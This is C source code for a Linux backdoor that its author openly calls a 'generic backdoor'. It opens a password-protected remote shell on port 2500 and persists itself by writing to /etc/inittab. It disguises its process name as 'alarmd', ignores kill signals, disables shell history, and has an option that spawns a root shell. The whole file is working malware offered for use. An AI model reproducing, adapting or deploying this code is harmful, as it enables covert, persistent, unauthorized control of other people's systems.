/* simple generic backdoor protected by a password encrypted with MD5 
 * it can also give you root privileges also protected by a password encrypted with MD5
 * greets to ^sq,UnPlugged,houdini,Angelboy and all my friends
 * special thanks to ins1der and Lecsi for helping me when i needed and answering my questions
 * for suggestion or some other stuff skilla@myway.com
*/

#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define BANNER "w0rd:"
#define MSG "Die bitch"
#define NOTE "All commands must end with a ;\n"
#define ROOT_PWD "c2ec25302de6c6ab729dbca78b9ec9ce"     // 0wned
#define ROOTME_PWD "f291caaa8226b6ccbceb9ac54ef3c03c" // w00t
#define INIT_FILE "/etc/inittab"
#define HOME_DIR "/"
#define HIDE "alarmd"
#define PORT 2500
#define BACKLOG 3

short int login(int fd);
void install(char *argv);
void usage(char *argv);
void rootme(char *argv,char *opt);
void backdoor(char *argv);
void child(int fd,int nfd);

char *shell[]={"/bin/sh",NULL};
char *env[]={"HISTFILE=/dev/null",NULL};

short int login(int fd)
{
  FILE *pipe;
  int i;
  char md5pwd[36],com[1024],pwd[50];

  memset(&md5pwd,'\0',sizeof(md5pwd));
  memset(&com,'\0',sizeof(com));
  memset(&pwd,'\0',sizeof(pwd));
  
  if ((send(fd,BANNER,sizeof(BANNER),0))==-1)
    {
      perror("send()");
      exit(0);
    }
  if ((recv(fd,pwd,sizeof(pwd),0))==-1)
    { 
      perror("recv()");
      exit(0);
    }
  for (i=0;i<strlen(pwd);i++)
    switch(pwd[i])
      {
        case '!':
	case ';':
	case '&':
	case '>':
	case '`':
	case '\r':
	case '\n':
	  pwd[i]='\0';
	  break;
      }        
  snprintf(com,sizeof(com),"/bin/echo -n %s|/usr/bin/md5sum",pwd);
  if ((pipe=popen(com,"r"))==NULL)
    {
      perror("pipe()");
      exit(0);
    }
  fread(md5pwd,32,1,pipe);
  pclose(pipe);
  if (!strcmp(ROOT_PWD,md5pwd)) 
    {
      if ((send(fd,NOTE,sizeof(NOTE),0))==-1)
        {
	  perror("send()");
	  exit(0);
	}
      return 1; 
    }
  else 
    return 2;
}

void install(char *argv)
{
  FILE *init;
  int i;
  char loc[60],ini[100];

  memset(&ini,'\0',sizeof(ini));
  memset(&loc,'\0',sizeof(loc));
  getcwd(loc,sizeof(loc));

  for (i=1;i<strlen(argv);i++)
    argv[i-1]=argv[i];
  argv[i-1]='\0';
  strncat(loc,argv,strlen(argv));
  strncat(ini,"bf:23:once:",11);
  strncat(ini,loc,strlen(loc));
  strncat(ini," -s",3);
  if ((init=fopen(INIT_FILE,"a"))==NULL)
    {
      perror("open()");
      exit(0);
    }
  fprintf(init,"\n%s",ini);
  fclose(init);      
  exit(0);
}  

void usage(char *argv)
{
  fprintf(stdout,"Generic backdoor by sk\n");
  fprintf(stdout,"Usage:%s\n\t",argv);
  fprintf(stdout,"-i:install\n\t");
  fprintf(stdout,"-r <password>:give root privileges\n\t");
  fprintf(stdout,"-s:start\n");
  fprintf(stdout,"skilla@myway.com\n");
  exit(0);
}

void rootme(char *argv,char *opt)
{
  FILE *pipe;
  char com[1024],md5pwd[36];
  
  memset(&com,'\0',sizeof(com));
  memset(&md5pwd,'\0',sizeof(md5pwd));
  
  snprintf(com,sizeof(com),"/bin/echo -n %s|/usr/bin/md5sum",optarg);
  if ((pipe=popen(com,"r"))==NULL)
    {
      perror("pipe()");
      exit(0);
    }
  fread(md5pwd,32,1,pipe);
  pclose(pipe);
  
  if (!strcmp(ROOTME_PWD,md5pwd))
    {
      setuid(0);
      setgid(0);
      execve(shell[0],shell,env);
    }
  else
    printf("%s is out of order",argv);
  exit(0);
}

void child(int fd,int nfd)
{
  short int res;
  
  close(fd);
  res=login(nfd);
  if (res==1) 
    {
      dup2(nfd,0);
      dup2(nfd,1);
      dup2(nfd,2);
      chdir(HOME_DIR);
      execve(shell[0],shell,env);
    }
  else
    exit(0);
}

void backdoor(char *argv)
{
  int fd,nfd;
  struct sockaddr_in serv;
  struct sockaddr_in cli;
  
  signal(SIGCHLD,SIG_IGN);
  signal(SIGINT,SIG_IGN);
  signal(SIGKILL,SIG_IGN);
  signal(SIGHUP,SIG_IGN);
  signal(SIGTERM,SIG_IGN);
  
  if (fork())
     exit(0);  

      
  if ((fd=socket(AF_INET,SOCK_STREAM,0))==-1)
    {
      perror("socket()");
      exit(0);
    }
  serv.sin_family=AF_INET;
  serv.sin_port=htons(PORT);
  serv.sin_addr.s_addr=INADDR_ANY;
  memset(&(serv.sin_zero),'\0',8);
  
  if ((bind(fd,(struct sockaddr *)&serv,sizeof(struct sockaddr_in)))==-1)
    {
      perror("bind()");
      exit(0);
    }
  if ((listen(fd,BACKLOG))==-1)  
    {
      perror("listen()");
      exit(0);
    }
  for (;;)
    { 
      int sin_size=sizeof(struct sockaddr_in);

      if ((nfd=accept(fd,(struct sockaddr *)&cli,&sin_size))==-1)
        {
	  perror("accept()");
	  exit(0);
	}
      switch(fork())
        {
	  case -1:perror("fork()");
	          exit(0);
	  case 0:child(fd,nfd);
	  default:close(nfd);
	          wait(NULL);
        }
    }
}

int main(int argc,char *argv[])
{
  int op;
  char opt[4]="isr:";
  
  op=getopt(argc,argv,opt);
  
  if (argc>1 && argv[1][1]=='s') 
    {
      memset(argv[1],'\0',strlen(argv[1]));
      memset(argv[0],'\0',strlen(argv[0]));
      strcpy(argv[0],HIDE);
    }

  switch (op)
    {
      case 'i':install(argv[0]);
               break;
      case 'r':rootme(argv[0],optarg);
               break;
      case 's':backdoor(argv[0]);	      
               break;
      default:usage(argv[0]);
    }
}